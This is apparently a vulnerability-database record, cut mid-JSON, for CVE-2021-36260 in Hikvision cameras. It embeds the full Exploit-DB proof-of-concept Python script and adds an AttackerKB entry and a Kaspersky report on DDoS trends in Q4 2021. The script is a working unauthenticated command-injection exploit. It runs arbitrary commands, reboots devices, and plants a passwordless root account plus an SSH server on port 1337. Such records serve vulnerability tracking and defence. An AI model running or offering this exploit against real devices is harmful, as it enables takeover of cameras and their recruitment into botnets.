"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "exploitdb", "title": "Hikvision Web Server Build 210702 - Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260", "2021-36260"], "modified": "2021-10-25T00:00:00", "id": "EDB-ID:50441", "href": "https://www.exploit-db.com/exploits/50441", "sourceData": "# Exploit Title: Hikvision Web Server Build 210702 - Command Injection\r\n# Exploit Author: bashis\r\n# Vendor Homepage: https://www.hikvision.com/\r\n# Version: 1.0\r\n# CVE: CVE-2021-36260\r\n# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\r\n\r\n# All credit to Watchful_IP\r\n\r\n#!/usr/bin/env python3\r\n\r\n\"\"\"\r\nNote:\r\n1) This code will _not_ verify if remote is Hikvision device or not.\r\n2) Most of my interest in this code has been concentrated on how to\r\n reliably detect vulnerable and/or exploitable devices.\r\n Some devices are easy to detect, verify and exploit the vulnerability,\r\n other devices may be vulnerable but not so easy to verify and exploit.\r\n I think the combined verification code should have very high accuracy.\r\n3) 'safe check' (--check) will try write and read for verification\r\n 'unsafe check' (--reboot) will try reboot the device for verification\r\n\r\n[Examples]\r\nSafe vulnerability/verify check:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check\r\n\r\nSafe and unsafe vulnerability/verify check:\r\n(will only use 'unsafe check' if not verified with 'safe check')\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot\r\n\r\nUnsafe vulnerability/verify check:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot\r\n\r\nLaunch and connect to SSH shell:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell\r\n\r\nExecute command:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd \"ls -l\"\r\n\r\nExecute blind command:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind \"reboot\"\r\n\r\n$./CVE-2021-36260.py -h\r\n[*] Hikvision CVE-2021-36260\r\n[*] PoC by bashis <mcw noemail eu> (2021)\r\nusage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]\r\n [--reboot] [--shell] [--cmd CMD]\r\n [--cmd_blind CMD_BLIND] [--noverify]\r\n [--proto {http,https}]\r\n\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n --rhost RHOST Remote Target Address (IP/FQDN)\r\n --rport RPORT Remote Target Port\r\n --check Check if vulnerable\r\n --reboot Reboot if vulnerable\r\n --shell Launch SSH shell\r\n --cmd CMD execute cmd (i.e: \"ls -l\")\r\n --cmd_blind CMD_BLIND\r\n execute blind cmd (i.e: \"reboot\")\r\n --noverify Do not verify if vulnerable\r\n --proto {http,https} Protocol used\r\n$\r\n\"\"\"\r\n\r\nimport os\r\nimport argparse\r\nimport time\r\n\r\nimport requests\r\nfrom requests import packages\r\nfrom requests.packages import urllib3\r\nfrom requests.packages.urllib3 import exceptions\r\n\r\n\r\nclass Http(object):\r\n def __init__(self, rhost, rport, proto, timeout=60):\r\n super(Http, self).__init__()\r\n\r\n self.rhost = rhost\r\n self.rport = rport\r\n self.proto = proto\r\n self.timeout = timeout\r\n\r\n self.remote = None\r\n self.uri = None\r\n\r\n \"\"\" Most devices will use self-signed certificates, suppress any warnings \"\"\"\r\n requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\r\n\r\n self.remote = requests.Session()\r\n\r\n self._init_uri()\r\n\r\n self.remote.headers.update({\r\n 'Host': f'{self.rhost}:{self.rport}',\r\n 'Accept': '*/*',\r\n 'X-Requested-With': 'XMLHttpRequest',\r\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',\r\n })\r\n \"\"\"\r\n self.remote.proxies.update({\r\n # 'http': 'http://127.0.0.1:8080',\r\n })\r\n \"\"\"\r\n\r\n def send(self, url=None, query_args=None, timeout=5):\r\n\r\n if query_args:\r\n \"\"\"Some devices can handle more, others less, 22 bytes seems like a good compromise\"\"\"\r\n if len(query_args) > 22:\r\n print(f'[!] Error: Command \"{query_args}\" to long ({len(query_args)})')\r\n return None\r\n\r\n \"\"\"This weird code will try automatically switch between http/https\r\n and update Host\r\n \"\"\"\r\n try:\r\n if url and not query_args:\r\n return self.get(url, timeout)\r\n else:\r\n data = self.put('/SDK/webLanguage', query_args, timeout)\r\n except requests.exceptions.ConnectionError:\r\n self.proto = 'https' if self.proto == 'http' else 'https'\r\n self._init_uri()\r\n try:\r\n if url and not query_args:\r\n return self.get(url, timeout)\r\n else:\r\n data = self.put('/SDK/webLanguage', query_args, timeout)\r\n except requests.exceptions.ConnectionError:\r\n return None\r\n except requests.exceptions.RequestException:\r\n return None\r\n except KeyboardInterrupt:\r\n return None\r\n\r\n \"\"\"302 when requesting http on https enabled device\"\"\"\r\n\r\n if data.status_code == 302:\r\n redirect = data.headers.get('Location')\r\n self.uri = redirect[:redirect.rfind('/')]\r\n self._update_host()\r\n if url and not query_args:\r\n return self.get(url, timeout)\r\n else:\r\n data = self.put('/SDK/webLanguage', query_args, timeout)\r\n\r\n return data\r\n\r\n def _update_host(self):\r\n if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:\r\n self.remote.headers.update({\r\n 'Host': self.uri[self.uri.rfind('://') + 3:],\r\n })\r\n\r\n def _init_uri(self):\r\n self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))\r\n\r\n def put(self, url, query_args, timeout):\r\n \"\"\"Command injection in the <language> tag\"\"\"\r\n query_args = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' \\\r\n f'<language>$({query_args})</language>'\r\n return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)\r\n\r\n def get(self, url, timeout):\r\n return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)\r\n\r\n\r\ndef check(remote, args):\r\n \"\"\"\r\n status_code == 200 (OK);\r\n Verified vulnerable and exploitable\r\n status_code == 500 (Internal Server Error);\r\n Device may be vulnerable, but most likely not\r\n The SDK webLanguage tag is there, but generate status_code 500 when language not found\r\n I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)\r\n (Issue: Could also be other directory than 'webLib', r/o FS etc...)\r\n status_code == 401 (Unauthorized);\r\n Defiantly not vulnerable\r\n \"\"\"\r\n if args.noverify:\r\n print(f'[*] Not verifying remote \"{args.rhost}:{args.rport}\"')\r\n return True\r\n\r\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\"')\r\n\r\n data = remote.send(url='/', query_args=None)\r\n if data is None:\r\n print(f'[-] Cannot establish connection to \"{args.rhost}:{args.rport}\"')\r\n return None\r\n print('[i] ETag:', data.headers.get('ETag'))\r\n\r\n data = remote.send(query_args='>webLib/c')\r\n if data is None or data.status_code == 404:\r\n print(f'[-] \"{args.rhost}:{args.rport}\" do not looks like Hikvision')\r\n return False\r\n status_code = data.status_code\r\n\r\n data = remote.send(url='/c', query_args=None)\r\n if not data.status_code == 200:\r\n \"\"\"We could not verify command injection\"\"\"\r\n if status_code == 500:\r\n print(f'[-] Could not verify if vulnerable (Code: {status_code})')\r\n if args.reboot:\r\n return check_reboot(remote, args)\r\n else:\r\n print(f'[+] Remote is not vulnerable (Code: {status_code})')\r\n return False\r\n\r\n print('[!] Remote is verified exploitable')\r\n return True\r\n\r\n\r\ndef check_reboot(remote, args):\r\n \"\"\"\r\n We sending 'reboot', wait 2 sec, then checking with GET request.\r\n - if there is data returned, we can assume remote is not vulnerable.\r\n - If there is no connection or data returned, we can assume remote is vulnerable.\r\n \"\"\"\r\n if args.check:\r\n print('[i] Checking if vulnerable with \"reboot\"')\r\n else:\r\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\" with \"reboot\"')\r\n remote.send(query_args='reboot')\r\n time.sleep(2)\r\n if not remote.send(url='/', query_args=None):\r\n print('[!] Remote is vulnerable')\r\n return True\r\n else:\r\n print('[+] Remote is not vulnerable')\r\n return False\r\n\r\n\r\ndef cmd(remote, args):\r\n if not check(remote, args):\r\n return False\r\n data = remote.send(query_args=f'{args.cmd}>webLib/x')\r\n if data is None:\r\n return False\r\n\r\n data = remote.send(url='/x', query_args=None)\r\n if data is None or not data.status_code == 200:\r\n print(f'[!] Error execute cmd \"{args.cmd}\"')\r\n return False\r\n print(data.text)\r\n return True\r\n\r\n\r\ndef cmd_blind(remote, args):\r\n \"\"\"\r\n Blind command injection\r\n \"\"\"\r\n if not check(remote, args):\r\n return False\r\n data = remote.send(query_args=f'{args.cmd_blind}')\r\n if data is None or not data.status_code == 500:\r\n print(f'[-] Error execute cmd \"{args.cmd_blind}\"')\r\n return False\r\n print(f'[i] Try execute blind cmd \"{args.cmd_blind}\"')\r\n return True\r\n\r\n\r\ndef shell(remote, args):\r\n if not check(remote, args):\r\n return False\r\n data = remote.send(url='/N', query_args=None)\r\n\r\n if data.status_code == 404:\r\n print(f'[i] Remote \"{args.rhost}\" not pwned, pwning now!')\r\n data = remote.send(query_args='echo -n P::0:0:W>N')\r\n if data.status_code == 401:\r\n print(data.headers)\r\n print(data.text)\r\n return False\r\n remote.send(query_args='echo :/:/bin/sh>>N')\r\n remote.send(query_args='cat N>>/etc/passwd')\r\n remote.send(query_args='dropbear -R -B -p 1337')\r\n remote.send(query_args='cat N>webLib/N')\r\n else:\r\n print(f'[i] Remote \"{args.rhost}\" already pwned')\r\n\r\n print(f'[*] Trying SSH to {args.rhost} on port 1337')\r\n os.system(f'stty echo; stty iexten; stty icanon; \\\r\n ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \\\r\n P@{args.rhost} -p 1337')\r\n\r\n\r\ndef main():\r\n print('[*] Hikvision CVE-2021-36260\\n[*] PoC by bashis <mcw noemail eu> (2021)')\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')\r\n parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')\r\n parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')\r\n parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')\r\n parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')\r\n parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: \"ls -l\")')\r\n parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: \"reboot\")')\r\n parser.add_argument(\r\n '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'\r\n )\r\n parser.add_argument(\r\n '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'\r\n )\r\n args = parser.parse_args()\r\n\r\n remote = Http(args.rhost, args.rport, args.proto)\r\n\r\n try:\r\n if args.shell:\r\n shell(remote, args)\r\n elif args.cmd:\r\n cmd(remote, args)\r\n elif args.cmd_blind:\r\n cmd_blind(remote, args)\r\n elif args.check:\r\n check(remote, args)\r\n elif args.reboot:\r\n check_reboot(remote, args)\r\n else:\r\n parser.parse_args(['-h'])\r\n except KeyboardInterrupt:\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50441", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-05-02T08:37:34", "description": "A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-36260", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260", "CVE-2021-36320"], "modified": "2022-02-20T00:00:00", "id": "AKB:1D0445C7-C9A7-44D8-BC02-6610FBEF828F", "href": "https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-03-17T11:28:01", "description": "\n\n## News roundup\n\nQ4 2021 saw the appearance of several new DDoS botnets. A zombie network, [named Abcbot](<https://securityaffairs.co/wordpress/124542/security/abcbot-ddos-botnet-linux.html>) by researchers, first hit the radar in July, but at the time it was little more than a simple scanner attacking Linux systems by brute-forcing weak passwords and exploiting known vulnerabilities. In October, the botnet was upgraded with DDoS functionality. Then in December, researchers at Cado Security linked the botnet to the Xanthe [cryptojacking](<https://encyclopedia.kaspersky.com/glossary/cryptojacking/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) group. This is further evidence that the same botnets are often used for mining and DDoS.\n\nThe EwDoor botnet, which first came to researchers' attention in late October, [turned out to be more picky](<https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/>) than Abcbot. This zombie network consists solely of EdgeMarc Enterprise Session Border Controller devices located on AT&T carrier networks. The bot infiltrated the devices through the [CVE-2017-6079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6079>) vulnerability, which allows execution of arbitrary commands. By exploiting a bug in the bot itself (one of the first versions accessed a non-existent C2 server registered by researchers), Netlab 360 managed to detect 5,700 infected devices. However, the cybercriminals later severed communication with this server. AT&T is [investigating](<https://therecord.media/att-takes-action-against-ddos-botnet-that-hijacked-voip-servers/>) attacks on EdgeMarc devices.\n\nIn November, Qrator Labs [recorded](<https://habr.com/ru/company/qrator/blog/593741/>) a series of short but powerful attacks on its systems and those of its clients. The attackers used a TCP data flood: they established a TCP connection to the victim's server, then flooded it with random heavy TCP packets. In some cases, DNS amplification was also used. The attacks, launched from thousands of cameras and routers, lasted 2\u20133 minutes and then stopped. Researchers note that the botnet is new, and they currently lack sufficient data to describe it. They also speculate that the short attack duration is because the attackers wish to remain undetected, so they do not borrow infected device users' communication channels for long.\n\nGoogle's Damian Menscher discovered a zombie network consisting of [vulnerable GitLab servers](<https://www.techtarget.com/searchsecurity/news/252509093/DDoS-botnet-exploiting-known-GitLab-vulnerability>). The botnet hijacked new devices by exploiting the [CVE-2021-22205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22205>) vulnerability, which GitLab patched in April 2021, and carried out DDoS attacks of over 1TB/s. Menscher does not specify whether the bot is entirely new or related to existing botnets. However, around the same time, Cloudflare [reported](<https://blog.cloudflare.com/cloudflare-blocks-an-almost-2-tbps-multi-vector-ddos-attack/>) a brief but powerful Mirai-type attack, involving, among other things, GitLab servers infected through CVE-2021-22205.\n\nKnown botnets made the news more than once in Q4. For instance, Moobot added a [relatively fresh vulnerability](<https://threatpost.com/moobot-botnet-hikvision-surveillance-systems/176879/>) to its arsenal. A bug designated as [CVE-2021-36260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) was found in some Hikvision camera models and patched in September 2021. Like CVE-2017-6079, this vulnerability allows attackers to execute arbitrary commands. Once on the device, Moobot waits for a command from the C2 server before launching a DDoS attack. Researchers link the campaign to a DDoS-as-a-Service provider whose Telegram channel they came across during their analysis. The channel was created in June and went live in August 2021.\n\nThe M\u0113ris botnet discovered [last quarter](<https://securelist.com/ddos-attacks-in-q3-2021/104796/>) turned out to be two botnets, reports Netscout. The company named the second one [Dvinis](<https://www.netscout.com/blog/asert/tale-two-botnets>) ("twin" in Latvian). Unlike its elder brother, it does not use HTTP pipelining, but is also deployed in high-power attacks. Moreover, according to Netscout, Dvinis accounts for 75% of all attacks attributed to M\u0113ris.\n\nIn late 2021, news broke of a [vulnerability in the Apache Log4j library](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), which laid claim to being the most dangerous vulnerability of the year. Log4Shell, as the vulnerability is called, is present in all versions of Log4j from 2.0-beta9 to 2.14.1, and allows an attacker to take full control over a vulnerable system. What's more, an exploit for the vulnerability is available online, and the library that contains it is used in millions of products, both commercial and open-source. Not surprisingly, [many cybercriminals](<https://www.securityweek.com/ransomware-trojans-ddos-malware-and-crypto-miners-delivered-log4shell-attacks>), including DDoS botnet developers, have added Log4Shell to their toolkit. In particular, [Mirai](<https://fidelissecurity.com/threatgeek/archive/observations-from-a-log4j-decoy-from-vulnerability-to-infection-to-ddos-in-record-time/>), [Muhstik](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) and Elknot bots are trying to exploit this vulnerability.\n\nAs for DDoS attacks themselves, media in the Philippines came under repeated fire during the past quarter. In mid-November, the online outfit [PinoyMedia Center](<https://newsinfo.inquirer.net/1518615/alternative-media-site-shuts-down-after-cyberattack>) was flooded; then in the first half of December the same fate befell the [news portal ABC-CBN News](<https://www.rappler.com/technology/abs-cbn-news-website-latest-victim-cyberattack/>), followed by the [media organization VERA Files](<https://verafiles.org/articles/vera-files-overcomes-cyberattack>); the digital media company Rappler was also [attacked several times](<https://www.rappler.com/technology/rappler-website-weathers-another-ddos-attack/>) a month by unknown actors. Also in Q4, the [Indonesian journalism initiative Project Multatuli](<https://www.thejakartapost.com/life/2021/10/07/project-multatuli-digitally-attacked-after-reporting-on-police-inaction-in-rape-case.html>) got DDoSed after publishing an article criticizing the work of local law enforcement agencies.\n\nCybercriminals also targeted tech companies this quarter. The Polish arm of T-Mobile reported the [largest ever attack on this sector in the country](<https://www.reuters.com/business/media-telecom/polish-t-mobile-unit-faces-cyber-attack-systems-not-compromised-2021-12-03/>), which, however, was repelled. Another DDoS target was the blockchain platform [Solana](<https://cointelegraph.com/news/solana-reportedly-hit-by-ddos-attack-but-network-remains-online>). Blockasset, an NFT marketplace powered by Solana, was the first to draw attention to the attack. The company noted that the DDoS had caused a slowdown in token distribution. GenesysGo, a Solana-based infrastructure provider, also noted some services were working intermittently, but assured there was no major cause for concern.\n\nThe DDoS attacks on VoIP providers continued. In early October, [British company VoIP Unlimited](<https://www.ispreview.co.uk/index.php/2021/10/ddos-attack-hits-voip-and-internet-provider-voip-unlimited-again.html>) fell victim again, having been attacked by DDoS extortionists last quarter. The new wave of junk traffic was accompanied by a ransom demand. Similar attacks affected [various other British providers](<https://www.bbc.com/news/technology-59053876>). And in November, clients of VoIP provider [Telnyx](<https://www.bleepingcomputer.com/news/security/telnyx-is-the-latest-voip-provider-hit-with-ddos-attacks/>) worldwide were hit by outages. The perpetrators could be the REvil group, which is linked to past attacks on VoIP providers and was [liquidated](<https://www.bbc.com/news/technology-59998925>) by Russian law enforcement agencies in January, after the US authorities had supplied information about the attackers.\n\nIn Q4, besides VoIP providers, [e-mail service providers](<https://therecord.media/ddos-attacks-hit-multiple-email-providers/>) were targeted by ransom DDoS (RDoS) campaigns. Those affected were mostly small companies that provide secure and private e-mail accounts by subscription or invitation: Runbox, Posteo, Fastmail, TheXYZ, Guerrilla Mail, Mailfence, Kolab Now and RiseUp. The attackers called themselves Cursed Patriarch and demanded a ransom of 0.06BTC from victims (around US$4,000 at the time of the attack).\n\nRansomwarers continued to use DDoS as additional leverage. For instance, right from the start the new Yanluowang ransomware [threatens to DDoS victims](<https://www.bleepingcomputer.com/news/security/new-yanluowang-ransomware-used-in-targeted-enterprise-attacks/>) if "they take the attackers for fools." Besides Yanluowang, the [HelloKitty ransomware](<https://securityintelligence.com/news/hellokitty-ransomware-group-ddos-extortion/>) group, known for [attacking](<https://www.kaspersky.com/blog/cd-projekt-ransomware-attack/38701/>) CD Projekt, the developer of _The Witcher_ and _Cyberpunk 2077_, added DDoS to its arsenal.\n\nSpeaking of games: attackers in Q4 did not leave gamers alone. In October, _Apex Legends_ players [set a record](<https://www.invenglobal.com/articles/15279/apex-players-win-longest-match-in-history-due-to-ddos-attack>) for the longest match ever, because the server was DDoSed throughout. And attacks on Blizzard in [November](<https://www.techtimes.com/articles/268483/20211124/activision-blizzard-s-battle-net-down-battle-net-ddos-attack-call-of-duty-warzone-minor-outage-overwatch-minor-outage.htm>) and [December](<https://www.digitaltrends.com/gaming/blizzard-hit-with-another-ddos/>) led to problems with accessing certain games, in particular _Overwatch_ and _World of Warcraft_. Players themselves also got it in the neck. Among those who [suffered](<https://dotesports.com/streaming/news/twitch-streamers-sodapoppin-xqc-nick-polom-get-ddosd-after-ip-leak>) were several popular streamers, likely due to an IP leak from the new title _Crab Game_: the streamers experienced issues after playing the game. Meanwhile, some _Dead by Daylight_ streamers were not only DDoSed, but [doxxed](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and swatted (the act of making a false report to the police with the intention of having a real-life SWAT team sent to the target's home). One of the victims tweeted that, during such a fake call, one of the police officers recognized him because he himself plays _Dead by Daylight_. How exactly the attackers got hold of the streamers' IP addresses and other data is unknown.\n\nhttps://twitter.com/Elix_9/status/1458330303437574149\n\nFans of _Titanfall 2_, fed up with DDoS attacks, took the initiative in Q4 and [created a mod](<https://www.pcgamer.com/titanfall-2-gets-fan-made-custom-servers-on-pc/>) for playing on custom servers if the official ones are down. Tracking the IP of a private server to flood it with junk traffic is not child's play, so this measure greatly reduces the likelihood of DDoS.\n\nSuccesses in the fight against botnets were reflected in Q4 news. In October, for instance, Ukrainian police [arrested](<https://therecord.media/ukraine-arrests-operator-of-ddos-botnet-with-100000-bots/>) the operator of a DDoS botnet consisting of 100,000 infected devices. And in December, Google [filed a lawsuit](<https://threatpost.com/google-glupteba-botnet-lawsuit/176826/>) against the operators of another botnet, Glupteba. The Internet giant also took steps to eliminate the botnet itself by blocking 63 million malicious documents, 908 cloud projects, more than a thousand Google accounts and a further 870 Google Ads accounts. Google also worked with other companies to shut down the botnet's C2 servers. Glupteba consists of a million infected IoT devices and Windows computers. The botnet can also install proxy servers on infected devices, mine cryptocurrency and conduct DDoS attacks. In addition, Glupteba uses the Bitcoin blockchain to store the addresses of backup C2 servers, making it harder to defeat. According to Kaspersky, it was this botnet that facilitated the spread of the notorious M\u0113ris last quarter.\n\nOne last thing, attackers regularly carry out DDoS attacks on each other. In November, unknown actors [tried to take down](<https://www.bleepingcomputer.com/news/security/dark-web-market-cannazon-shuts-down-after-massive-ddos-attack/>) the dark-web marketplace Cannazon, which, as the name suggests, specializes in the sale of cannabis. The resource was shut down shortly afterwards, but its administrators [claim](<https://www.techradar.com/news/dark-web-marketplace-bites-the-dust-after-colossal-ddos-attack>) they had long planned to close it anyway, and the DDoS was a convenient pretext to act sooner rather than later.\n\n## Quarter and year trends\n\nQ4 played out in line with our forecasts: we saw impressive growth in the number of DDoS attacks, setting a new record in the history of our observations. Let's look at the figures:\n\n_Comparative number of DDoS attacks, Q3 and Q4 2021, and Q4 2020. Q4 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154544/01-en-ddos-report-q4.png>))_\n\nThe number of attacks in Q4 increased by 52% against the previous quarter and more than 4.5 times against the same period last year. The numbers look scary, but instead of rushing to conclusions, better to figure out why they are so.\n\nLet's start with the increase in the number of DDoS attacks relative to Q3. Such growth in the last three months of the year is a traditional seasonal fluctuation that we predict (and that occurs) pretty much every year. Towards the end of the year, life steps up a gear, and this cannot fail to affect the DDoS market: competition in retail hots up, students sit exams, various activists become more lively: all this leads to an increase in the number of attacks.\n\nIn addition, the size of the DDoS market is inversely proportional to that of the cryptocurrency market, which we've written about several times. This is because DDoS and mining capacities are partially interchangeable, so botnet owners tend to deploy them in mining when cryptocurrency prices are high and in DDoS when they fall. We witnessed precisely that in Q4, and not for the first time: a rise in the number of DDoS attacks amid a sharp drop in the value of cryptocurrencies.\n\nBoth of these factors \u2014 seasonal fluctuations and falling cryptocurrency prices \u2014 buoyed the DDoS attack market throughout Q4, hence the 1.5-fold increase. This becomes even clearer when viewing the stats by month: October accounted for 16% of all DDoS attacks in Q4, November 46% and December 38%.\n\n_Percentage distribution of DDoS attacks by month, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154631/02-en-ddos-report-q4.png>))_\n\nNow let's see where the frightening 4.5-fold increase relative to the previous year came from. In contrast to 2021's all-time high Q4, 2020 posted a record low. In Q4 2020, we observed the opposite situation: a declining DDoS market against the backdrop of rampant cryptocurrency prices. In fact, the DDoS market spent just about the whole of 2021 recovering from this collapse, hence such impressive growth: in essence, 2021's all-time high divided by 2020's all-time low.\n\nThe diagram below clearly shows the increase in the number of DDoS attacks over the year, as well as peaks attributable to the cryptocurrency collapse in the summer of 2021 and at the end of the year.\n\n_Dynamics of DDoS attacks, October 2020\u2013December 2021; October 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154708/12-en-ddos-report-q4.png>))_\n\nAs for DDoS targets, the cross-industry distribution of attacks was fairly even \u2014 we cannot say that DDoS activity was higher in any particular sector. Perhaps the only thing of note was the spike in attacks on educational resources in November (largely in the Moscow region) and December (largely in the Republic of Tatarstan). We cannot pinpoint the reason for this, but most likely the attacks were related to regional specifics in the field of education, for example, the exam or vacation schedule.\n\n## DDoS attack statistics\n\n### Methodology\n\nKaspersky has a long history of combating cyberthreats, including DDoS attacks of any type and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.\n\nA part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C2 servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.\n\nThis report contains DDoS Intelligence statistics for Q4 2021.\n\nIn the context of this report, the incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. If the same resource is attacked by the same botnet after an interval of 24 hours or more, two attacks will be counted. Bot requests originating from different botnets but directed at one resource also count as separate attacks.\n\nThe geographic locations of DDoS attack victims and C2 servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.\n\nDDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.\n\n### Quarter summary\n\n * Most of all, attackers in Q4 took aim at US-based resources: the country accounts for 43.55% of attacks and 44.54% of unique targets.\n * Our DDoS Intelligence system recorded 86,710 DDoS attacks.\n * The quarter's quietest days fell on Chinese Singles' Day and Black Friday, two mega shopping events.\n * 94,29% of attacks lasted less than 4 hours.\n * Half of the DDoS attacks were carried out by means of UDP flooding.\n * 46,49% of the botnet C2 servers were located in the US.\n * 70,96% of attacks on Kaspersky SSH honeypots were carried out by bots in Russia.\n\n### DDoS attacks geography\n\nIn Q4, as in previous quarters in 2021, the bulk of DDoS attacks targeted US-based resources (43.55%). And the country's share in the geographic distribution rose once more. China (9.96%) returned to second place, up 2.22 p.p. on the previous reporting period, while the Hong Kong SAR (8.80%) took bronze: its share fell by a factor of more than 1.5 against the previous quarter.\n\n_Distribution of DDoS attacks by country and territory, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154746/03-en-ddos-report-q4.png>))_\n\nThe share of attacks increased in Germany (4.85%) and France (3.75%), which moved up to fourth and fifth positions, respectively. Canada (3.64%) remained in sixth place, the UK (3.21%) climbed to seventh, while eighth spot in Q4 went to the Netherlands (2.75%), where things had been relatively calm in the previous reporting period. Rounding out the TOP 10 countries and territories by number of attacks at the end of 2021 are Singapore (2.68%) and Brazil (2.08%), whose share more than halved from the previous quarter.\n\nAs usual, the geography of unique targets mirrored the distribution of individual attacks. The most targets were located in the US (44.54%), whose share increased compared to the previous quarter. The second and third lines are taken by the Hong Kong SAR (9.07%) and China (8.12%), respectively.\n\n_Distribution of unique targets by country and territory, Q3 and Q4 2021 